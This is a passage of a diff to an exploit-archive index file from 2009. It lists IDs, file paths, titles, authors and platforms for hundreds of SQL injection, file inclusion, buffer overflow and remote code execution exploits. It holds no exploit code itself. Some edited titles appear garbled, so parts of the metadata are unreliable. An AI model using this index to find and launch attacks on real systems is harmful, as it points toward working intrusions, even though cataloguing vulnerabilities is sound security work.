Bypass) SQL Injection Vulnerability",2009-05-19,Snakespc,php,webapps,0 8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield <= 1.1.0.62 XSS/Code Execution Vulnerability",2009-05-19,inking,windows,remote,0 8743,platforms/php/webapps/8743.txt,"Joomla Casino 0.3.1 Multiple SQL Injection Exploits",2009-05-20,ByALBAYX,php,webapps,0 -8744,platforms/php/webapps/8744.txt,"exJune Officer Message System v1 Multiple Remote Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 +8744,platforms/php/webapps/8744.txt,"exJune Officer Message System 1 - Multiple Remote Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 Remote Command injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 Remote Command Injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 @@ -8258,7 +8258,7 @@ id,file,description,date,author,platform,type,port 8756,platforms/asp/webapps/8756.txt,"ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8758,platforms/windows/remote/8758.html,"ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 -8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 Multiple Remote SQL Injection Vulnerabilities",2009-05-21,YEnH4ckEr,php,webapps,0 +8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 Multiple Remote SQL Injection Vulnerabilities",2009-05-21,YEnH4ckEr,php,webapps,0 8761,platforms/php/webapps/8761.txt,"Article Directory (Auth Bypass) SQL Injection Vulnerability",2009-05-21,Hakxer,php,webapps,0 8762,platforms/php/webapps/8762.txt,"Article Directory (page.php) Remote Blind SQL Injection Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0 8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0 @@ -8330,10 +8330,10 @@ id,file,description,date,author,platform,type,port 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability",2009-05-29,Qabandi,php,webapps,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 URL Search Hook (Windows Explorer) Remote BOF PoC",2009-06-01,Nine:Situations:Group,windows,dos,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 Web Management Console Arbitrary Command Exec",2009-06-01,Securitum,hardware,local,0 -8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold v2 (seller) Remote SQL Injection Exploit",2009-06-01,Br0ly,php,webapps,0 +8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) Remote SQL Injection Exploit",2009-06-01,Br0ly,php,webapps,0 8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 (IAManager.dll) Remote BOF Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 Multiple SQL Injection Vulnerabilities",2009-06-01,"Nico Leidecker",php,webapps,0 -8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 (ID3v1/ID3v2 Tag) Remote Stack BOF PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 +8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - (ID3v1/ID3v2 Tag) Remote Stack BOF PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 8838,platforms/php/webapps/8838.txt,"eliteCMS 1.01 (SQL/XSS) Multiple Remote Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 8839,platforms/php/webapps/8839.txt,"Open-school 1.0 (id) Remote SQL Injection Vulnerability",2009-06-01,OzX,php,webapps,0 8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 (tid) Blind SQL Injection Vulnerability",2009-06-01,OzX,php,webapps,0 @@ -8425,7 +8425,7 @@ id,file,description,date,author,platform,type,port 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability",2009-06-11,Br0ly,php,webapps,0 8932,platforms/php/webapps/8932.txt,"Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities",2009-06-11,Br0ly,php,webapps,0 8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0 -8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,"Matteo Memelli",windows,remote,0 +8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0 8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"Campus Virtual-LMS (XSS/SQL Injection) Multiple Remote Vulnerabilities",2009-06-12,YasiĂ³n,php,webapps,0 @@ -8435,7 +8435,7 @@ id,file,description,date,author,platform,type,port 8941,platforms/php/webapps/8941.txt,"Pivot 1.40.4-7 Multiple Remote Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8942,platforms/php/webapps/8942.txt,"TBDev 01-01-2008 Multiple Remote Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8943,platforms/php/webapps/8943.txt,"TransLucid 1.75 Multiple Remote Vulnerabilities",2009-06-12,intern0t,php,webapps,0 -8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities",2009-06-12,GoLd_M,php,webapps,0 +8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail <= 3.2.0-1.8 - Remote File / Overwrite Vulnerabilities",2009-06-12,GoLd_M,php,webapps,0 8946,platforms/php/webapps/8946.txt,"Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln",2009-06-15,ByALBAYX,php,webapps,0 8947,platforms/php/webapps/8947.txt,"Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 (top) Remote File Inclusion Vulnerability",2009-06-15,Br0ly,php,webapps,0 @@ -8456,7 +8456,7 @@ id,file,description,date,author,platform,type,port 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass Vulnerability",2009-06-15,"Tom Neaves",hardware,remote,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player Add-On HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0 -8966,platforms/php/webapps/8966.txt,"phportal v1 (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0 +8966,platforms/php/webapps/8966.txt,"phportal 1- (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip D3 Bi0s",php,webapps,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 URL Processing Buffer Overflow Exploit (meta)",2009-06-16,Trancer,windows,remote,0 @@ -8493,7 +8493,7 @@ id,file,description,date,author,platform,type,port 9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 Remote SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0 9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit",2009-06-23,Nibin,windows,dos,0 9007,platforms/windows/dos/9007.rb,"HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos (meta)",2009-06-23,Nibin,windows,dos,0 -9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0 +9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0 9009,platforms/php/webapps/9009.txt,"BASE <= 1.2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-06-24,"Tim Medin",php,webapps,0 9010,platforms/php/webapps/9010.txt,"Glossword <= 1.8.11 (index.php x) Local File Inclusion Vulnerability",2009-06-24,t0fx,php,webapps,0 9011,platforms/php/webapps/9011.txt,"Joomla Component com_pinboard Remote File Upload Vulnerability",2009-06-24,ViRuSMaN,php,webapps,0 @@ -8514,7 +8514,7 @@ id,file,description,date,author,platform,type,port 9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 (cat.php CatID) SQL Injection Vulnerability",2009-06-29,SecurityRules,php,webapps,0 9028,platforms/php/webapps/9028.txt,"Joomla Component com_php (id) Blind SQL Injection Vulnerability",2009-06-29,"Chip D3 Bi0s",php,webapps,0 9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 smb:// URI Stack BOF PoC",2009-06-29,Trancer,windows,dos,0 -9030,platforms/php/webapps/9030.txt,"Joomla Component com_K2 <= 1.0.1b (category) SQL Injection Vuln",2009-06-29,"Chip D3 Bi0s",php,webapps,0 +9030,platforms/php/webapps/9030.txt,"Joomla Component com_K2 -q 1.0.1b (category) SQL Injection Vuln",2009-06-29,"Chip D3 Bi0s",php,webapps,0 9031,platforms/windows/remote/9031.py,"Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)",2009-06-29,His0k4,windows,remote,19810 9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 Admin Login Blind SQL Injection Vulnerability",2009-06-29,"Adam Baldwin",php,webapps,0 9033,platforms/windows/dos/9033.pl,"SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC",2009-06-29,hack4love,windows,dos,0 @@ -8541,7 +8541,7 @@ id,file,description,date,author,platform,type,port 9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook <= 2.1 Remote SQL Injection Vulnerability",2009-06-30,Dante90,php,webapps,0 9057,platforms/php/webapps/9057.txt,"TSEP <= 0.942.02 Multiple Remote Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 -9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 Arbitrary Administrator Account Vulnerability",2009-06-30,"ThE g0bL!N",php,webapps,0 +9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 Arbitrary Administrator Account Vulnerability",2009-06-30,"ThE g0bL!N",php,webapps,0 9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 (plf File) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b (.M3U File) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 Arbitrary Delete Message Vulnerability",2009-07-01,Stack,php,webapps,0 @@ -8603,10 +8603,10 @@ id,file,description,date,author,platform,type,port 9119,platforms/php/webapps/9119.txt,"LionWiki (index.php page) Local File Inclusion Vulnerability",2009-07-10,MoDaMeR,php,webapps,0 9121,platforms/php/webapps/9121.php,"Morcego CMS <= 1.7.6 Remote Blind SQL Injection Exploit",2009-07-10,darkjoker,php,webapps,0 9122,platforms/php/webapps/9122.txt,"Opial 1.0 Arbitrary File Upload/XSS/SQL Injection Vulnerabilities",2009-07-11,LMaster,php,webapps,0 -9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 (ASX,M3U,M3L) Local BOF PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 -9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 (.M3U/M3L/TXT File) Local Stack Overflow PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 +9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 (ASX,M3U,M3L) Local BOF PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 +9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 (.M3U/M3L/TXT File) Local Stack Overflow PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 Multiple SQL Injection Vulnerabilities",2009-07-11,MizoZ,php,webapps,0 -9126,platforms/php/webapps/9126.txt,"Joomla Component com_category (catid) SQL Injection Vulnerability",2009-07-11,Prince_Pwn3r,php,webapps,0 +9126,platforms/php/webapps/9126.txt,"Joomla Component com_category (catid) SQL Injection Vulnerability",2009-07-11,Prince_Pwn3r,php,webapps,0 9127,platforms/php/webapps/9127.txt,"d.net CMS Arbitrary Reinstall/Blind SQL Injection Exploit",2009-07-11,darkjoker,php,webapps,0 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client (response) Remote BOF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 9129,platforms/php/webapps/9129.txt,"Censura 1.16.04 (bSQL/XSS) Multiple Remote Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 @@ -8624,7 +8624,7 @@ id,file,description,date,author,platform,type,port 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 (.ICP File) Local Stack Overflow PoC",2009-07-14,"ThE g0bL!N",windows,dos,0 9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z .Mpr Local buffer Overflow Exploit",2009-07-14,n00b,windows,local,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 Multiple Local/Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 -9144,platforms/php/webapps/9144.txt,"Mobilelib Gold v3 Local File Disclosure Vulnerability",2009-07-14,Qabandi,php,webapps,0 +9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure Vulnerability",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 Remote Blind SQL Injection Exploit",2009-07-14,Qabandi,php,webapps,0 9146,platforms/windows/local/9146.pl,"Icarus 2.0 (.ICP File) Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 (.vib File) Local Stack Overflow PoC",2009-07-14,hack4love,windows,dos,0 @@ -8673,9 +8673,9 @@ id,file,description,date,author,platform,type,port 9191,platforms/linux/local/9191.txt,"Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day",2009-07-17,spender,linux,local,0 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9193,platforms/php/webapps/9193.pl,"WebVision 2.1 (news.php n) Remote SQL Injection Exploit",2009-07-17,Mr.tro0oqy,php,webapps,0 -9194,platforms/php/webapps/9194.txt,"RadBIDS GOLD v4 Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 +9194,platforms/php/webapps/9194.txt,"RadBIDS GOLD 4.0 - Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9195,platforms/php/webapps/9195.txt,"RadLance Gold 7.5 Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 -9196,platforms/php/webapps/9196.txt,"RadNICS Gold v5 Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 +9196,platforms/php/webapps/9196.txt,"RadNICS Gold 5.0 - Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9199,platforms/windows/local/9199.txt,"Adobe related service (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 (.mpl/.m3u) Local Heap Overflow PoC",2009-07-20,hack4love,windows,dos,0 @@ -8683,11 +8683,11 @@ id,file,description,date,author,platform,type,port 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 Authentication Bypass Vulnerability",2009-07-20,Mr.tro0oqy,php,webapps,0 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0 9205,platforms/php/webapps/9205.txt,"MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities",2009-07-20,SirGod,php,webapps,0 -9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0 +9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0 9207,platforms/windows/local/9207.sh,"PulseAudio setuid Local Privilege Escalation Exploit",2009-07-20,n/a,windows,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)",2009-07-20,n/a,linux,local,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT (httpd service) Remote Command Execution Vulnerability",2009-07-20,gat3way,hardware,remote,0 -9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0 +9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 (.sgp file) Crash Exploit",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471(.m3u) Local Heap Overflow PoC",2009-07-20,"D3V!L FucK3r",windows,dos,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit (pl)",2009-07-20,netsoul,windows,remote,0 @@ -8720,7 +8720,7 @@ id,file,description,date,author,platform,type,port 9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Exploit",2009-07-24,skys,php,webapps,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 (index.php idAuthor) SQL Injection Vulnerability",2009-07-24,NoGe,php,webapps,0 9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit (osx)",2009-07-24,Dr_IDE,osx,remote,0 -9248,platforms/php/webapps/9248.txt,"SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability",2009-07-24,SwEET-DeViL,php,webapps,0 +9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Auth Bypass) SQL Injection Vulnerability",2009-07-24,SwEET-DeViL,php,webapps,0 9249,platforms/php/webapps/9249.txt,"Xoops Celepar Module Qas (codigo) SQL Injection Vulnerability",2009-07-24,s4r4d0,php,webapps,0 9250,platforms/php/webapps/9250.sh,"Wordpress 2.8.1 (url) Remote Cross Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 SQL Injection Vulnerability",2009-07-24,d3b4g,php,webapps,0 @@ -8742,7 +8742,7 @@ id,file,description,date,author,platform,type,port 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0 9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0 -9270,platforms/php/webapps/9270.txt,"Super Mod System v3 (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0 +9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0 9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL injection Vulnerability",2009-07-27,boom3rang,php,webapps,0 9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (py)",2009-07-27,Dr_IDE,windows,local,0 9273,platforms/php/webapps/9273.php,"Allomani Mobile 2.5 Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 @@ -8756,13 +8756,13 @@ id,file,description,date,author,platform,type,port 9281,platforms/php/webapps/9281.txt,"Limny 1.01 (Auth Bypass) SQL Injection Vulnerability",2009-07-27,SirGod,php,webapps,0 9282,platforms/php/webapps/9282.txt,"Magician Blog <= 1.0 (ids) Remote SQL Injection Vulnerability",2009-07-27,Evil-Cod3r,php,webapps,0 9283,platforms/php/webapps/9283.txt,"Magician Blog <= 1.0 (Auth Bypass) SQL injection Vulnerability",2009-07-27,Evil-Cod3r,php,webapps,0 -9284,platforms/php/webapps/9284.txt,"SerWeb <= 2.1.0-dev1 2009-07-02 Multiple RFI Vulnerabilities",2009-07-27,GoLd_M,php,webapps,0 +9284,platforms/php/webapps/9284.txt,"SerWeb <= 2.1.0-dev1 2009-07-02 - Multiple RFI Vulnerabilities",2009-07-27,GoLd_M,php,webapps,0 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 (.mpf /.m3u File) Local Stack Overflow Exploit (SEH)",2009-07-28,corelanc0d3r,windows,local,0 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script (paidbanner.php ID) SQL Injection Vulnerability",2009-07-28,"ThE g0bL!N",php,webapps,0 9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 (linkout.php id) SQL Injection Vulnerability",2009-07-28,MizoZ,php,webapps,0 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod <= 2.0.4 Blind SQL Injection Exploit",2009-07-28,Dante90,php,webapps,0 -9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability",2009-07-28,Mr.tro0oqy,php,webapps,0 -9291,platforms/windows/local/9291.pl,"MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH)",2009-07-28,Koshi,windows,local,0 +9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability",2009-07-28,Mr.tro0oqy,php,webapps,0 +9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local BOF Exploit (SEH)",2009-07-28,Koshi,windows,local,0 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0 9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 (login_ok) Auth Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0 9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0 @@ -8791,14 +8791,14 @@ id,file,description,date,author,platform,type,port 9317,platforms/windows/dos/9317.c,"Google SketchUp Pro 7.0 (.skp file) Remote Stack Overflow PoC",2009-08-01,LiquidWorm,windows,dos,0 9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)",2009-07-31,His0k4,windows,remote,0 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager Remote BOF Exploit",2009-08-01,Bruk0ut,windows,remote,30000 -9320,platforms/php/webapps/9320.php,"Arab Portal v2.x (forum.php qc) Remote SQL Injection Exploit",2009-08-01,rEcruit,php,webapps,0 +9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) Remote SQL Injection Exploit",2009-08-01,rEcruit,php,webapps,0 9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 (.pls) Universal Buffer Overflow Exploit (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b Multiple Remote File Inclusion Vulnerabilities",2009-08-01,NoGe,php,webapps,0 9323,platforms/multiple/dos/9323.txt,"VirtualBox 2.2 - 3.0.2 r49928 Local Host Reboot PoC",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0 9324,platforms/php/webapps/9324.txt,"Joomla Component com_jfusion (Itemid) Blind SQL Injection Vuln",2009-08-01,"Chip D3 Bi0s",php,webapps,0 9325,platforms/php/webapps/9325.txt,"PortalXP - Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities",2009-08-01,SirGod,php,webapps,0 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites",2009-08-01,SirGod,php,webapps,0 -9327,platforms/php/webapps/9327.txt,"Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 +9327,platforms/php/webapps/9327.txt,"Mobilelib Gold 3.0 - (Auth Bypass/SQL) Multiple Remote Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd (Auth Bypass) SQL Injection Vulnerability",2009-08-03,Ro0T-MaFia,asp,webapps,0 9329,platforms/windows/local/9329.pl,"BlazeDVD 5.1 Professional (.PLF File) Local Buffer Overflow Exploit (SEH)",2009-08-03,hack4love,windows,local,0 9330,platforms/windows/remote/9330.py,"Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH)",2009-08-03,His0k4,windows,remote,0 @@ -8843,7 +8843,7 @@ id,file,description,date,author,platform,type,port 9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 Remote SQL Injection Vulnerability",2009-08-05,Ins3t,php,webapps,0 9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 (bSQL-XSS) Multiple Vulns",2009-08-05,Moudi,php,webapps,0 9371,platforms/php/webapps/9371.txt,"OpenNews 1.0 (SQLI/RCE) Multiple Remote Vulnerabilities",2009-08-05,SirGod,php,webapps,0 -9372,platforms/php/webapps/9372.txt,"Portel v2008 (decide.php patron) Blind SQL Injection Vulnerability",2009-08-05,"Chip D3 Bi0s",php,webapps,0 +9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection Vulnerability",2009-08-05,"Chip D3 Bi0s",php,webapps,0 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0 @@ -8893,7 +8893,7 @@ id,file,description,date,author,platform,type,port 9426,platforms/windows/local/9426.java,"FTPShell Client 4.1 RC2 Name Session Stack Overflow Exploit",2009-08-13,zec,windows,local,0 9427,platforms/windows/dos/9427.py,"VLC Media Player 1.0.0/1.0.1 smb:// URI Handling BOF PoC",2009-08-13,Dr_IDE,windows,dos,0 9428,platforms/windows/local/9428.pl,"pIPL 2.5.0 (.PLS /.PL) Universal Local Buffer Exploit (SEH)",2009-08-13,hack4love,windows,local,0 -9429,platforms/windows/dos/9429.py,"EmbedThis Appweb v3.0B.2-4 Multiple Remote Buffer Overflow PoC",2009-08-13,Dr_IDE,windows,dos,0 +9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow PoC",2009-08-13,Dr_IDE,windows,dos,0 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 Remote SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 9431,platforms/php/webapps/9431.txt,"Wordpress Plugin WP-Syntax <= 0.9.1 Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download Vulnerability",2009-08-13,"aBo MoHaMeD",hardware,remote,0 @@ -8916,16 +8916,16 @@ id,file,description,date,author,platform,type,port 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 (RCE/CSRF/LFI/XSS) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"Dreampics Builder (exhibition_id) Remote SQL Injection Vulnerability",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 (article) Blind SQL Injection 